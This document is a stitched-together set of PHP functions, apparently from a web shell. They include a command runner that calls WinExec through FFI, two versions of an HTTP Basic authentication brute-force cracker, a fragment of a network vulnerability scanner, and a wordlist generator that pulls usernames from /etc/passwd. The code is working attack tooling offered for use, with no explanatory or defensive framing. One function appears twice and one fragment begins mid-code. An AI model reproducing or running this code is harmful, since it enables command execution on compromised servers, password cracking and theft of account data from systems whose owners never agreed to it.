function ffishelL($command) { $name = whereistmP() . "\\" . uniqid('NJ'); $api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $res = $api->WinExec("cmd.exe /c {$command} >\"{$name}\"", 0); while (!file_exists($name)) { sleep(1); } $exec = file_get_contents($name); unlink($name); return $exec; }
function authcrackeR() { global $errorbox, $et, $t, $hcwd; if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])) { if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) { $log = 1; $file = $_REQUEST['logfilE']; } else { $log = 0; } $data = ''; $method = $_REQUEST['method'] ? 'POST' : 'GET'; if (strstr($_REQUEST['target'], '?')) { $data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1); $_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?')); } spliturL($_REQUEST['target'], $host, $page); $type = $_REQUEST['combo']; $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : ''; if ($method == 'GET') { $page .= $data; } $dictionary = fopen($_REQUEST['dictionary'], 'r'); echo '<font color=blue>'; while (!feof($dictionary)) { if ($type) { $combo = trim(fgets($dictionary), " \n\r"); $user = substr($combo, 0, strpos($combo, ':')); $pass = substr($combo, strpos($combo, ':') + 1); } else { $pass = trim(fgets($dictionary), " \n\r"); } $so = fsockopen($host, 80, $en, $es, 5); if (!$so) { echo "{$errorbox} Can not connect to host{$et}"; break; } else { $packet = "{$method} /{$page} HTTP/1.0\r\nAccept-Encoding: text\r\nHost: {$host}\r\nReferer: {$host}\r\nConnection: Close\r\nAuthorization: Basic " . base64_encode("{$user}:{$pass}"); if ($method == 'POST') { $packet .= 'Content-Type: application/x-www-form-urlencoded\\r\\nContent-Length: ' . strlen($data); } $packet .= "\r\n\r\n"; $packet .= $data; fputs($so, $packet); $res = substr(fgets($so), 9, 2); fclose($so); if ($res == '20') { echo "U: {$user} P: {$pass}</br>"; if ($log) { file_add_contentS($file, "U: {$user} P: {$pass}\r\n"); } } } } echo 'Done!</font>'; } else { echo "<center><form method='POST' name=form>{$t}HTTP Auth cracker:</td><td bgcolor='#333333'><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='20%' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target value=localhost size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='" . whereistmP() . DIRECTORY_SEPARATOR . ".log'> {$hcwd} <input class=buttons type=submit value=Start></form>{$et}</center>"; } }
function authcrackeR() { global $hcwd; if (!empty($_REQUEST['target'])) { if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) { $log = 1; $file = $_REQUEST['logfilE']; } else { $log = 0; } $data = ''; $method = $_REQUEST['method'] ? 'POST' : 'GET'; if (strstr($_REQUEST['target'], '?')) { $data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1); $_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?')); } $u = parse_url($_REQUEST['target']); $host = $u['host']; $page = $u['path']; $type = $_REQUEST['combo']; $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : ''; if ($method == 'GET') { $page .= $data; } echo '<font color=#FA0>'; if ($_REQUEST['mode'] == 'wl') { $dictionary = fopen($_REQUEST['dictionary'], 'r'); while (!feof($dictionary)) { if ($type) { $combo = trim(fgets($dictionary), " \n\r"); $user = substr($combo, 0, strpos($combo, ':')); $pass = substr($combo, strpos($combo, ':') + 1); } else { $pass = trim(fgets($dictionary), " \n\r"); } $so = @fsockopen($host, 80, $en, $es, 5); if (!$so) { echo "Can not connect to host"; break; } else { $packet = "{$method} {$page} HTTP/1.0\r\nAccept-Encoding: text\r\nHost: {$host}\r\nReferer: {$host}\r\nConnection: Close\r\nAuthorization: Basic " . base64_encode("{$user}:{$pass}"); if ($method == 'POST') { $packet .= 'Content-Type: application/x-www-form-urlencoded\\r\\nContent-Length: ' . strlen($data); } $packet .= "\r\n\r\n"; $packet .= $data; fputs($so, $packet); $res = substr(fgets($so), 9, 2); fclose($so); if ($res == '20') { echo "U: {$user} P: {$pass}</br>"; if ($log) { file_add_contentS($file, "U: {$user} P: {$pass}\r\n"); } } } } } else { $code = ' $so = @fsockopen ( "' . $host . '", 80, $en, $es, 5 ); $packet = "' . $method . " {$page} " . 'HTTP/1.0\\r\\nAccept-Encoding: text\\r\\nHost: ' . $host . '\\r\\nReferer: ' . $host . '\\r\\nConnection: Close\\r\\nAuthorization: Basic " . base64_encode ( "' . $user . ':".$word )."\\r\\n"'; if ($method == "POST") { $code .= ".'Content-Type: application/x-www-form-urlencoded\r\nContent-Length: " . strlen("'{$data}'") . "'"; } $code .= "\r\n\r\n" . $data . ';fputs ( $so, $packet ); $test= ( substr ( fgets ( $so ), 9, 2 ) == "20");'; echo $code; if ($res = brute($_REQUEST['mode'], $_REQUEST['min'], $_REQUEST['max'], $code) != null) { echo "<b>{$user}:{$res}</b><br />"; } } echo 'Done!</font>'; } else { echo ' <form name=cracker method="POST"> <div class="fieldwrapper"> <label class="styled" style="width:320px">HTTP Auth cracker</label> </div><div class="fieldwrapper"> <label class="styled">Target:</label> <div class="thefield"> <input type="url" name="target" value="http://' . getenv('HTTP_HOST') . '/admin/" size="30" /> </div> </div> <div class="fieldwrapper"><label class="styled">Input:</label><div class="thefield"> <select name="mode" id="mode" onChange="toggle()"> <option value="09">Bruteforce [0-9]</option> <option value="az">Bruteforce [a-z]</option> <option value="az09">Bruteforce [a-z] [0-9]</option> <option value="az09AZ">Bruteforce [a-z] [A-Z] [0-9]</option> <option value="all">Bruteforce [ALL]</option> <option value="wl">Wordlist</option> </select> </div></div> <div class="fieldwrapper" id="dic"> <label class="styled">Dictionary:</label> <div class="thefield"> <input type="text" name="dictionary" size="30" /> </div> </div><div class="fieldwrapper" id="fcr"> <label class="styled">Dictionary type:</label> <div class="thefield"> <ul style="margin-top:0;"> <li><input type="radio" value="0" checked name="combo" onClick="document.cracker.user.disabled = false;" /> <label>Simple (P)</label></li> <li><input type="radio" name="combo" value="1" onClick="document.cracker.user.disabled = true;" /> <label>Combo (U:P)</label></li> </ul> </div> </div> <div class="fieldwrapper"> <label class="styled">Method:</label> <div class="thefield"> <select name="method"><option selected value="1">POST</option><option value="0">GET</option></select> </div> </div><div class="fieldwrapper"> <label class="styled">Username:</label> <div class="thefield"> <input type="text" name="user" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled"><input type=checkbox name=loG value=1 onClick="document.cracker.logfilE.disabled = !document.cracker.logfilE.disabled;" checked> Log:</label> <div class="thefield"> <input type=text name=logfilE size=25 value="' . whereistmP() . DIRECTORY_SEPARATOR . '.log"> </div> </div> ' . $hcwd . ' <div class="buttonsdiv"> <input type="submit" name="start" value="Start" style="margin-left: 150px;" /> </div> </form><script>toggle();</script>'; } }
flusheR(); } $time = time() - $start; echo "Done! ({$time} seconds)</font>"; } elseif (!empty($_REQUEST['securityscanner'])) { echo "<font color=yellow>"; $start = time(); $from = $_REQUEST['from']; $to = (int) $_REQUEST['to']; $timeout = (int) $_REQUEST['timeout']; $f = substr($from, strrpos($from, ".") + 1); $from = substr($from, 0, strrpos($from, ".")); if (!empty($_REQUEST['httpscanner'])) { echo "Loading webserver bug list..."; flusheR(); $buglist = whereistmP() . DIRECTORY_SEPARATOR . namE(); $dl = @downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db', $buglist); if ($dl) { $file = file($buglist); echo "Done! scanning started.<br><br>"; } else { echo "Failed!!! scanning started without webserver security testing...<br><br>"; } flusheR(); } else { $fr = htmlspecialchars($from); echo "Scanning {$fr}.{$f}-{$fr}.{$to}:<br><br>"; } for ($i = $f; $i <= $to; $i++) { $output = 0; $ip = "{$from}.{$i}";
function dicmakeR() { global $errorbox, $windows, $footer, $t, $et, $hcwd; if (!empty($_REQUEST['combo']) && $_REQUEST['combo'] == 1) { $combo = 1; } else { $combo = 0; } if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])) { $min = $_REQUEST['min']; $max = $_REQUEST['max']; if ($max < $min) { die($errorbox . "Bad input!{$et}" . $footer); } $s = $w = ""; $out = $_REQUEST['output']; $r = $_REQUEST['range'] == 'a' ? 'a' : 'A'; if ($_REQUEST['range'] == 0) { $r = 0; } for ($i = 0; $i < $min; $i++) { $s .= $r; } $dic = fopen($out, 'a'); if (is_nan($r)) { while (strlen($s) <= $max) { $w = $s; if ($combo) { $w = "{$w}:{$w}"; } fwrite($dic, $w . "\n"); $s++; } } else { while (strlen($w) <= $max) { $w = (string) str_repeat("0", $min - strlen($s)) . $s; if ($combo) { $w = "{$w}:{$w}"; } fwrite($dic, $w . "\n"); $s++; } } fclose($dic); echo "<font color=blue>Done</font>"; } if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])) { $input = fopen($_REQUEST['input'], 'r'); if (!$input) { if ($windows) { echo $errorbox . "Unable to read from " . htmlspecialchars($_REQUEST['input']) . "{$et}<br>"; } else { $input = explode("\n", shelL("cat {$input}")); $output = fopen($_REQUEST['output'], 'w'); if ($output) { foreach ($input as $in) { $user = $in; $user = trim(fgets($in), " \n\r"); if (!strstr($user, ":")) { continue; } $user = substr($user, 0, strpos($user, ':')); if ($combo) { fwrite($output, $user . ":" . $user . "\n"); } else { fwrite($output, $user . "\n"); } } fclose($input); fclose($output); echo "<font color=blue>Done</font>"; } } } else { $output = fopen($_REQUEST['output'], 'w'); if ($output) { while (!feof($input)) { $user = trim(fgets($input), " \n\r"); if (!strstr($user, ":")) { continue; } $user = substr($user, 0, strpos($user, ':')); if ($combo) { fwrite($output, $user . ":" . $user . "\n"); } else { fwrite($output, $user . "\n"); } } fclose($input); fclose($output); echo "<font color=blue>Done</font>"; } else { echo $errorbox . " Unable to write data to " . htmlspecialchars($_REQUEST['input']) . "{$et}<br>"; } } } elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])) { $res = downloadiT($_REQUEST['url'], $_REQUEST['output']); if ($combo && $res) { $file = file($_REQUEST['output']); $output = fopen($_REQUEST['output'], 'w'); foreach ($file as $v) { fwrite($output, "{$v}:{$v}\n"); } fclose($output); } echo "<font color=blue>Done</font>"; } else { $temp = whereistmP(); echo "<center>{$t}Wordlist generator:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Range:</td><td bgcolor=\"#666666\"><select name=range><option value=a>a-z</option><option value=Z>A-Z</option><option value=0>0-9</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Min lenght:</td><td bgcolor=\"#808080\"><select name=min><option value=1>1</option><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8>8</option><option value=9>9</option><option value=10>10</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Max lenght:</td><td bgcolor=\"#666666\"><select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"{$temp}/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox name=combo style=\"border-width:1px;background-color:#666666;\" value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>{$hcwd}<input class=buttons type=submit value=Make></td></tr></form></table><br>{$t}Grab dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Grab from:</td><td bgcolor=\"#666666\"><input type=text value=\"/etc/passwd\" name=input size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"{$temp}/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>{$hcwd}<input class=buttons type=submit value=Grab></td></tr></form></table><br>{$t}Download dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">URL:</td><td bgcolor=\"#666666\"><input type=text value=\"http://vburton.ncsa.uiuc.edu/wordlist.txt\" name=url size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"{$temp}/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>{$hcwd}<input class=buttons type=submit value=Get></td></tr></form></table></center>"; } }